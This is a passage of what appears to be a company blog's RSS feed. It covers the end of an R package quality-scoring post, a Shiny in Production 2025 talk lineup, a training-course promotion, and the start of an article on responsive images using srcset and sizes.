&lt;p&gt;This scoring framework represents an ongoing effort to bring greater systematisation and transparency to R package quality assessment. As the R ecosystem continues to evolve, we anticipate that both our methodology and our understanding of what constitutes package quality will require ongoing refinement.
We welcome feedback from the community about both the theoretical framework presented here and its practical implementation. Particular areas where community input would be valuable include the appropriate weightings for different quality attributes, the identification of additional metrics that might enhance assessment accuracy, and the development of context-specific guidance for different usage scenarios.
Our commitment to annual methodology review ensures that this framework will adapt to reflect changes in best practices, tooling availability, and community standards whilst maintaining the stability and predictability that users require for practical decision-making.&lt;/p&gt;
&lt;h2 id="get-in-touch"&gt;Get in Touch&lt;/h2&gt;
&lt;p&gt;If you&amp;rsquo;re interested in learning more about R validation and how it can be used to unleash the power of open source in your organisation, &lt;a href="https://www.jumpingrivers.com/contact/?subject=Litmus" rel="external"&gt;contact us&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id="references"&gt;References&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/should-i-use-your-r-pkg/" rel="external"&gt;Risk Appetite&lt;/a&gt; in R packages&lt;/li&gt;
&lt;li&gt;&lt;a href="https://pharmar.org/white-paper/" rel="external"&gt;White paper&lt;/a&gt; from the Validation Hub on assessing R package accuracy&lt;/li&gt;
&lt;li&gt;&lt;a href="https://pharmar.org/categories/case-studies/" rel="external"&gt;Case Studies&lt;/a&gt; from various companies. Our approach builds on these ideas.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/litmus-scoring-r-validation/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Shiny in Production 2025: Full Length Talks</title><link>https://www.jumpingrivers.com/blog/shiny-in-production-2025-full-lineup/</link><pubDate>Tue, 17 Jun 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-in-production-2025-full-lineup/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-2025-full-lineup/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-in-production-2025-full-lineup/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;style&gt;
main h4 a:after { content: unset; }
main h4 a { text-decoration: unset; }
&lt;/style&gt;
&lt;p&gt;We are pleased to announce the full line-up for this year&amp;rsquo;s
&lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;Shiny in Production&lt;/a&gt; conference!
The conference includes nine full-length talks (25 minutes each) and a
lightning talk session (5 minutes per talk); we&amp;rsquo;ll cover the lightning talks in a separate blog.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://shiny-in-production.jumpingrivers.com/"&gt;&lt;button class="buttony-link central-content" type="button"&gt;Register
now&lt;/button&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3 id="talks"&gt;Talks&lt;/h3&gt;
&lt;h4 id="cameron-race---head-of-children-and-schools-statistics-and-product-manager"&gt;&lt;a href="https://www.linkedin.com/in/cam-race-a5048b106/" rel="external"&gt;Cameron Race&lt;/a&gt; - &lt;a href="https://www.gov.uk/government/organisations/department-for-education" rel="external"&gt;Head of Children and Schools Statistics and Product Manager&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;shinyGovstyle: A &amp;lsquo;Shiny&amp;rsquo; Secret Weapon for Production-Ready Government Public Services&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/cam-race@2x.jpg" alt="Photo of Cameron Race" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;In the UK, we are required to make public sector websites accessible to all users. While there is a wealth of UK government data publicly available through a number of existing digital services, it can be tough to engage with. Government analysts are increasingly turning to R Shiny to enhance their data dissemination, making it more
engaging for users, but with hundreds of analysts working in silos across government, how can analysts build full digital services in a way that carries the same consistency, trustworthiness and authority as a domain such as GOV.UK?&lt;/p&gt;
&lt;h4 id="charlie-gao---posit-software-pbc"&gt;&lt;a href="https://www.linkedin.com/in/charliegao/" rel="external"&gt;Charlie Gao&lt;/a&gt; - &lt;a href="https://posit.co/" rel="external"&gt;Posit Software, PBC&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Advances in the Shiny Ecosystem&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/charlie-gao@2x.jpg" alt="Photo of Charlie Gao" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;Charlie Gao, Senior Software Engineer on Posit’s open source team, will review some of the latest high-performance async tooling developed by Posit to support R Shiny in terms of performance, scalability and user experience.&lt;/p&gt;
&lt;br&gt;
&lt;br&gt;
&lt;h4 id="colin-fay---thinkr"&gt;&lt;a href="https://bsky.app/profile/colinfay.bsky.social" rel="external"&gt;Colin Fay&lt;/a&gt; - &lt;a href="https://rtask.thinkr.fr/" rel="external"&gt;ThinkR&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;After {shiny} — Bringing R to Mobile with webR&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/colin-fay@2x.jpg" alt="Photo of Colin Fay" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;As the use of mobile devices becomes increasingly central to how users interact with data products, the R community has long sought ways to bring R-powered applications into the mobile space. Historically, this has meant adapting {shiny} apps for smaller screens—either through responsive design or packages like {shinyMobile}. While effective for certain use cases, these approaches are fundamentally web-based, requiring a server and a stable internet connection, and lacking access to native device features.&lt;/p&gt;
&lt;p&gt;This talk presents a new path forward: Rlinguo, a fully native mobile application built with webR, a version of R compiled to WebAssembly. Unlike traditional {shiny}-based solutions, Rlinguo runs R directly on the device, without a server. It works offline, stores data locally, and can leverage native mobile APIs—pushing the boundaries of what’s possible with R in a mobile context.&lt;/p&gt;
&lt;p&gt;Through this case study, we’ll explore the architecture behind Rlinguo, contrast it with the {shiny} model, and discuss what it means for the future of R development. Topics will include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;What it takes to embed R in a mobile app using webR&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Technical and design trade-offs between web-based and native solutions&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Practical applications for offline, device-integrated R tools&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Whether you&amp;rsquo;re building with {shiny} today or simply curious about the next evolution of R in production, this session offers a look at where R can go when it steps beyond the browser.&lt;/p&gt;
&lt;h4 id="gabriela-de-lima-marin---brazilian-network-information-centre"&gt;&lt;a href="https://www.linkedin.com/in/gabriela-de-lima-marin/" rel="external"&gt;Gabriela De Lima Marin&lt;/a&gt; - &lt;a href="https://www.nic.br/who-we-are/" rel="external"&gt;Brazilian Network Information Centre&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;A Collaborative Initiative for Mapping and Georeferencing Public Schools in Brazil&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/gabriela-lima@2x.jpg" alt="Photo of Gabriela De Lima Marin" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;This project presents a collaborative initiative aimed at improving the geolocation accuracy of Brazilian public schools through an interactive Shiny web application.&lt;/p&gt;
&lt;p&gt;By integrating existing location data from the Brazilian School Census with APIs from Google, Microsoft, and OpenStreetMap, we established an innovative workflow to assign accurate geographic coordinates to schools previously lacking precise location data.&lt;/p&gt;
&lt;p&gt;The Shiny application provides a user-friendly interface allowing school administrators and education managers to visually verify and manually adjust school locations via interactive maps. Over the past two years, this approach enabled the precise geolocation of previously unlocated schools and significantly improved the accuracy of school geolocation data.&lt;/p&gt;
&lt;p&gt;The geolocation data collected and validated through this project will be openly shared with relevant governmental stakeholders, promoting transparency and supporting evidence-based decision-making. Moreover, the project exemplifies how collaborative data science and innovative web technology—particularly R Shiny—can be effectively leveraged in public administration, enabling managers, stakeholders, and the community to directly contribute to data accuracy and positively influence educational outcomes in Brazil.&lt;/p&gt;
&lt;h4 id="jack-anderson---national-disease-registration-service-nhs-england"&gt;&lt;a href="https://www.linkedin.com/in/jack-anderson-bb1160178"&gt;Jack Anderson&lt;/a&gt; - &lt;a href="https://digital.nhs.uk/about-nhs-digital/corporate-information-and-documents/directions-and-data-provision-notices/data-provision-notices-dpns/national-disease-registration-service" rel="external"&gt;National Disease Registration Service, NHS England&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Transforming the reporting of national patient outcomes with Shiny: 30-day mortality post-Systemic Anti-Cancer Therapy&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/jack-anderson.jpg" alt="Photo of Jack Anderson" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;In June 2020, the National Disease Registration Service began reporting 30-day mortality post-Systemic Anti-Cancer Therapy (SACT) Case-Mix Adjusted Rates (CMAR) to NHS trusts in England.
This work applies logistic regression to report trust-level case-mix adjusted 30-day mortality rates, which enable comparisons between trusts and with the national average. Historically, results were shared as an Excel workbook with an accompanying companion brief and FAQ document, and each report was shared in
isolation from previous releases. Since April 2023, implementation of R Shiny has enabled 30-day mortality rates to be reported seamlessly on an interactive, publicly accessible dashboard. Utilising
the Plotly and DT packages, dynamic funnel plots and data tables are tailored to user needs through
Shiny input pickers, which reactively subset and summarise data visualisations based on user selections.&lt;/p&gt;
&lt;p&gt;This enables NHS trust users to flexibly review their 30-day mortality outcomes against those of other trusts, their wider Cancer Alliance, and national averages, both overall and stratified by key patient
demographics.&lt;/p&gt;
&lt;p&gt;The Shiny dashboard also enables users to view current and previous CMAR reports together in one place and includes download button functionality for documentation and underlying data.
With dedicated tabs for summary data, trust exclusions, and trust response statements, Shiny allows for end-to-end exploration of CMAR outcomes, making it easier for users to gain insight into clinical practice.
The resulting Shiny dashboard supports clinical governance within trusts and enables clinical colleagues to better understand their patient outcomes within their wider context.&lt;/p&gt;
&lt;h4 id="laura-mawer--marcus-palmer---datacove-harrison-palmer-limited"&gt;&lt;a href="https://www.linkedin.com/in/lauramawer2/" rel="external"&gt;Laura Mawer&lt;/a&gt; &amp;amp; &lt;a href="https://www.linkedin.com/in/marcus-palmer-9ba93338/" rel="external"&gt;Marcus Palmer&lt;/a&gt; - &lt;a href="https://datacove.co.uk/" rel="external"&gt;Datacove&lt;/a&gt;, Harrison-Palmer Limited&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Using Shiny for Python to Power AI-Driven University Application Forecasting&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/laura-mawer@2x.jpg" alt="Photo of Laura Mawer" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;img src="images/marcus-palmer@2x.jpg" alt="Photo of Marcus Palmer" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;Universities face growing uncertainty in student recruitment, making accurate forecasting critical for strategic and financial planning. Athena is an AI-powered prediction tool that leverages Shiny for Python to provide real-time insights into application trends. By combining machine learning (Random Forest models), trend analysis, and interactive scenario planning, Athena enables universities to test recruitment strategies, adjust campaign spending, and instantly see the projected impact on future application numbers.&lt;/p&gt;
&lt;p&gt;This talk will explore how Shiny for Python was used to develop a fully interactive forecasting tool without requiring extensive front-end development. We will discuss why Shiny for Python was chosen, how it integrates with a machine learning pipeline, and how it powers real-time scenario analysis with dynamic dashboards. Additionally, we’ll demonstrate how AI-generated recommendations via an API enhance decision-making, providing actionable insights tailored to user-selected scenarios.&lt;/p&gt;
&lt;p&gt;Attendees will gain practical knowledge on building AI-driven, interactive applications using Shiny for Python, implementing predictive models, and designing intuitive decision-support tools for non-technical users. The session will conclude with a live demo, showing Athena in action and sharing best practices for deploying Shiny for Python in production. This talk is designed for developers, data scientists, engineers, and senior decision-makers looking to leverage AI-powered forecasting, business intelligence, and strategic planning in a real-world application.&lt;/p&gt;
&lt;h4 id="nic-crane---nc-data-labs"&gt;&lt;a href="https://www.linkedin.com/in/niccrane/" rel="external"&gt;Nic Crane&lt;/a&gt; - &lt;a href=""&gt;NC Data Labs&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;htmlwidgets Are a Secret Sauce in R – Can LLMs Make Them the Perfect Condiment?&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/nic-crane@2x.jpg" alt="Photo of Nic Crane" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;htmlwidgets quietly power some of the most compelling Shiny apps out there,
but writing them from scratch can be fiddly and time-consuming. In this talk,
we&amp;rsquo;ll kick things off by taking an audience-sourced ingredient list and asking
a large language model to whip up a fresh htmlwidget. Then we&amp;rsquo;ll plate up a version
we prepared earlier - also model-generated - but chopped, seasoned, and finished with
our own touches. Along the way, we&amp;rsquo;ll explore how LLMs can assist in crafting htmlwidgets
that reflect your flavour of R - from tidy eval to package structure - rather than sticking
to a bland house style.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-2025-full-lineup/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Why JR’s Training is Different</title><link>https://www.jumpingrivers.com/blog/why-train-with-jr-2025-r-python-bayesian-statistics-machine-learning/</link><pubDate>Mon, 09 Jun 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/why-train-with-jr-2025-r-python-bayesian-statistics-machine-learning/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/why-train-with-jr-2025-r-python-bayesian-statistics-machine-learning/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/why-train-with-jr-2025-r-python-bayesian-statistics-machine-learning/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;At Jumping Rivers, we believe training should be more than just a tick-box exercise. It should be transformative. Whether you’re learning R, Python, SQL, Git or Posit for the first time or diving into advanced topics like machine learning and Quarto, our courses are built to help you actually use what you learn — not just watch someone code. View our upcoming catalogue &lt;a href="https://www.jumpingrivers.com/training/public/" rel="external"&gt;here&lt;/a&gt;!&lt;/p&gt;
&lt;h2 id="what-sets-us-apart"&gt;What Sets Us Apart?&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Expert Trainers&lt;/strong&gt;: Our trainers aren’t just good with code —
they’re professional data scientists who solve real-world problems for industry clients every day.
From building dashboards to optimising machine learning models, they bring this experience straight into the classroom.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;High-Quality Content&lt;/strong&gt;: We regularly update our material to reflect the latest best practices, tools, and workflows.
No tired examples. No generic slides. Just practical, polished, and engaging content that’s been road-tested across sectors.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Hands-On and Practical&lt;/strong&gt;: Expect live coding, interactive exercises, and the space to ask questions.
You’ll finish the course with code you wrote and skills you can apply immediately.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Tailored for You&lt;/strong&gt;: We design our sessions around your level, your pace, and your goals.
Whether you’re an academic, analyst, developer, or decision-maker, you’ll get value from day one.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="what-people-are-saying"&gt;What People Are Saying&lt;/h2&gt;
&lt;p&gt;&amp;ldquo;Genuinely one of the best courses I’ve attended — well-paced, friendly, and full of real-world examples.&amp;rdquo;&lt;/p&gt;
&lt;p&gt;&amp;ldquo;The trainer was fantastic — incredibly knowledgeable and approachable. I finally feel confident using Git and R together.&amp;rdquo;&lt;/p&gt;
&lt;p&gt;&amp;ldquo;I loved how applied it all was. We weren’t just learning syntax — we were solving actual problems.&amp;rdquo;&lt;/p&gt;
&lt;p&gt;&amp;ldquo;Great value. I’ve already used what I learned in a project at work.&amp;rdquo;&lt;/p&gt;
&lt;h2 id="upcoming-live-training-with-super-early-bird-tickets-"&gt;Upcoming Live Training (with Super Early Bird Tickets 🎉)&lt;/h2&gt;
&lt;p&gt;Here are all the upcoming courses for July and August. Please note all times are UK time.&lt;/p&gt;
&lt;h3 id="7-8th-july"&gt;7–8 July&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-introduction-tidyverse-readr-ggplot2-dplyr/" rel="external"&gt;Introduction to R&lt;/a&gt; - 09:00AM-12:30PM&lt;/p&gt;
&lt;h3 id="1415-july"&gt;14–15 July&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/data-tidyverse-dplyr-tidyr-lubridate-forcats" rel="external"&gt;Data Wrangling in the Tidyverse&lt;/a&gt; - 09:00AM-12:30PM&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-introduction-shiny-application-web" rel="external"&gt;Introduction to Shiny&lt;/a&gt; - 01:30PM-05:00PM&lt;/p&gt;
&lt;h3 id="2122-july"&gt;21–22 July&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-programming-functions-looping-conditionals" rel="external"&gt;Programming with R&lt;/a&gt; - 09:00AM-12:30PM&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/sql-introduction-postgres-aws-database" rel="external"&gt;Introduction to SQL&lt;/a&gt; - 09:00AM-12:30PM&lt;/p&gt;
&lt;h3 id="2829-july"&gt;28–29 July&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-advanced-graphics-ggplot2-plotly-themes-scaling-faceting" rel="external"&gt;Data Visualisation with ggplot2&lt;/a&gt; - 09:00AM-12:30PM&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-prediction-inference-analytics-machine-learning-tidymodels" rel="external"&gt;Machine Learning with Tidymodels&lt;/a&gt; - 01:30PM-05:00PM&lt;/p&gt;
&lt;h3 id="1112-august"&gt;11–12 August&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-introduction-visualisation-manipulation" rel="external"&gt;Introduction to Python&lt;/a&gt; - 09:00AM-12:30PM&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-statistics-modelling-linear-regression-clustering" rel="external"&gt;Statistical Modeling with R&lt;/a&gt; - 01:30PM-05:00PM&lt;/p&gt;
&lt;h3 id="1819-august"&gt;18–19 August&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-programming-control-flow-functions" rel="external"&gt;Programming with Python&lt;/a&gt; - 09:00AM-12:30PM&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-prediction-inference-tidymodels-lda-pre-processing-tree-based-models" rel="external"&gt;Advanced Machine Learning with Tidymodels&lt;/a&gt; - 01:30PM-05:00PM&lt;/p&gt;
&lt;h3 id="2021-august"&gt;20–21 August&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-matplotlib-seaborn-visualisation" rel="external"&gt;Data Visualisation with Python&lt;/a&gt; - 09:00AM-12:30PM&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-introduction-tidyverse-readr-ggplot2-dplyr/" rel="external"&gt;Introduction to R&lt;/a&gt; - 01:30PM-05:00PM&lt;/p&gt;
&lt;h2 id="ready-to-skill-up"&gt;Ready to Skill Up?&lt;/h2&gt;
&lt;p&gt;✅ Small class sizes&lt;/p&gt;
&lt;p&gt;✅ Live sessions with expert trainers&lt;/p&gt;
&lt;p&gt;✅ Immediate impact on your day-to-day work&lt;/p&gt;
&lt;p&gt;✅ Super early bird tickets — limited and going fast!&lt;/p&gt;
&lt;p&gt;🎟 &lt;a href="https://www.jumpingrivers.com/training/public/" rel="external"&gt;Sign up now&lt;/a&gt; and invest in training that actually moves the needle. Whether you&amp;rsquo;re upskilling your team or boosting your own confidence, you’re in the right place.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/why-train-with-jr-2025-r-python-bayesian-statistics-machine-learning/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Rethinking Image Formats</title><link>https://www.jumpingrivers.com/blog/rethinking-image-formats/</link><pubDate>Thu, 05 Jun 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/rethinking-image-formats/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/rethinking-image-formats/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/rethinking-image-formats/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;link rel="stylesheet" href="assets/style.css" /&gt;
&lt;script src="assets/script.mjs" type="module"&gt;&lt;/script&gt;
&lt;p&gt;Adding images to a web page used to be straightforward. You’d add the &lt;code&gt;img&lt;/code&gt; tag to the HTML, set the &lt;em&gt;src&lt;/em&gt; attribute to the appropriate URL and, hopefully, write some informative &lt;em&gt;alt&lt;/em&gt; text. (You might also add some CSS, either inline or via a stylesheet.)&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-html" data-lang="html"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;&lt;span style="color:#7ee787"&gt;img&lt;/span&gt; src&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;plot.png&amp;#34;&lt;/span&gt; alt&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Scatter plot of age vs score. Line of best fit runs through the points, and an outlier can be seen at age 28, score 40.&amp;#34;&lt;/span&gt; /&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;It&amp;rsquo;s slightly more complicated today, with monitor and browser technology changing the requirements, at least if you are using raster images (like JPEGs, PNGs and GIFs) and want things to look good for &lt;em&gt;all&lt;/em&gt; your users. High-density screens on smartphones have been popular for a while, but 4K and 5K monitors are also becoming more affordable. To make text easy to read, these are often set to 200% scaling so that one measured pixel corresponds to 2 real pixels in each dimension. (For smartphones and tablets this scaling can even be 300%, though their true pixel counts are lower than those of 4K and 5K monitors.) A result of all this is that, for images not to look pixelated on these screens, they need twice as many pixels in each direction - that&amp;rsquo;s four times the number of pixels for a given image display size. So what can we do about this?&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2025-rethinking-image-formats"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="using-the-srcset-attribute"&gt;Using the &lt;em&gt;srcset&lt;/em&gt; Attribute&lt;/h2&gt;
&lt;p&gt;Fortunately, browsers added the &lt;em&gt;srcset&lt;/em&gt; attribute to make it easier for the developer to specify multiple images to use. The browser then picks the “best” option for a given user based on the information given in the &lt;em&gt;srcset&lt;/em&gt; attribute and information the browser already has about the device on which the page is being viewed. The simplest way to use this attribute is to specify an image that is twice as large in the &lt;em&gt;srcset&lt;/em&gt; attribute alongside a &amp;ldquo;2x&amp;rdquo; marker. By convention, we name the larger image the same as the smaller image, but with @2x in the name just before the extension:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-html" data-lang="html"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;&lt;span style="color:#7ee787"&gt;img&lt;/span&gt; src&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;plot.png&amp;#34;&lt;/span&gt; srcset&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;plot@2x.png 2x&amp;#34;&lt;/span&gt; alt&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Scatter plot of age vs score. Line of best fit runs through the points, and an outlier can be seen at age 28, score 40.&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This tells the browser to serve the base image to users with &amp;ldquo;regular&amp;rdquo; screens and the larger image to those with scaled screens. You could also add a &amp;ldquo;3x&amp;rdquo; version here if you wanted, though that would require an image with nine times as many pixels as the base image. The file size may not be nine times that of the base image, because compression algorithms scale well, but it will still be considerably bigger.&lt;/p&gt;
&lt;p&gt;The shortcoming with the above syntax is that it&amp;rsquo;s not really targeting the right thing. It tells the browser to choose based only on scaling factors and not on the actual rendered image sizes. An image could be set to display at 600 &amp;ldquo;CSS&amp;rdquo; pixels on a wide screen, like a desktop monitor, and 300 CSS pixels on a narrower one, like a phone. For a phone with 2 times scaling, the 600 pixel image would then look fine, but the browser doesn&amp;rsquo;t inherently know that the 1200 pixel image is unnecessary. So it will (probably) load the 1200 pixel image, making page-load slower than necessary and potentially gobbling up more of the user&amp;rsquo;s mobile data than warranted.&lt;/p&gt;
&lt;p&gt;The specification for &lt;em&gt;srcset&lt;/em&gt; offers an alternative that seems to solve this issue: just directly list the widths of available images by specifying a number and the letter &amp;ldquo;w&amp;rdquo;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-html" data-lang="html"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;&lt;span style="color:#7ee787"&gt;img&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; srcset&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;plot-small.png 300w, plot.png 600w, plot-large.png 1200w&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; alt&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Scatter plot of age vs score. Line of best fit runs through the points, and an outlier can be seen at age 28, score 40.&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If the browser knows what size the &lt;code&gt;img&lt;/code&gt; element will be rendered at, the sizes of the image options and the pixel density of the screen, it can pick the best image for the job. The catch is that, at least when the browser sees the &lt;code&gt;img&lt;/code&gt; tag for the first time, it won&amp;rsquo;t know what size it will be rendered at unless we specifically tell it. We can do that using the &lt;em&gt;sizes&lt;/em&gt; attribute on the &lt;code&gt;img&lt;/code&gt; element. Unfortunately, for responsive layouts this can get very messy and very confusing very quickly.&lt;/p&gt;
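&lt;p&gt;For a simple layout, a minimal sketch might look like the following. It assumes (purely for illustration) that the image is displayed 300 CSS pixels wide on viewports up to 600 pixels wide and 600 CSS pixels wide otherwise; the breakpoint is hypothetical and would need to match your own CSS.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-html" data-lang="html"&gt;&amp;lt;!-- Assumed layout: 300 CSS px wide on narrow viewports, 600 CSS px otherwise --&amp;gt;
&amp;lt;img
  src=&amp;#34;plot.png&amp;#34;
  srcset=&amp;#34;plot-small.png 300w, plot.png 600w, plot-large.png 1200w&amp;#34;
  sizes=&amp;#34;(max-width: 600px) 300px, 600px&amp;#34;
  alt=&amp;#34;Scatter plot of age vs score. Line of best fit runs through the points, and an outlier can be seen at age 28, score 40.&amp;#34;&amp;gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;With these values, a phone with 2 times scaling needs 300 × 2 = 600 real pixels, so the browser can choose plot.png instead of the 1200 pixel image. The &lt;em&gt;src&lt;/em&gt; attribute is kept as a fallback for browsers that ignore &lt;em&gt;srcset&lt;/em&gt;.&lt;/p&gt;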
&lt;p&gt;If you want to get into the nitty gritty of using &lt;em&gt;srcset&lt;/em&gt; with &lt;em&gt;sizes&lt;/em&gt; then there is a great article on &lt;a href="https://css-tricks.com/a-guide-to-the-responsive-images-syntax-in-html/" rel="external"&gt;CSS Tricks&lt;/a&gt; that goes into way more detail than we have space for here. Let&amp;rsquo;s, instead, look at alternative ways of reducing the burden of large images.&lt;/p&gt;
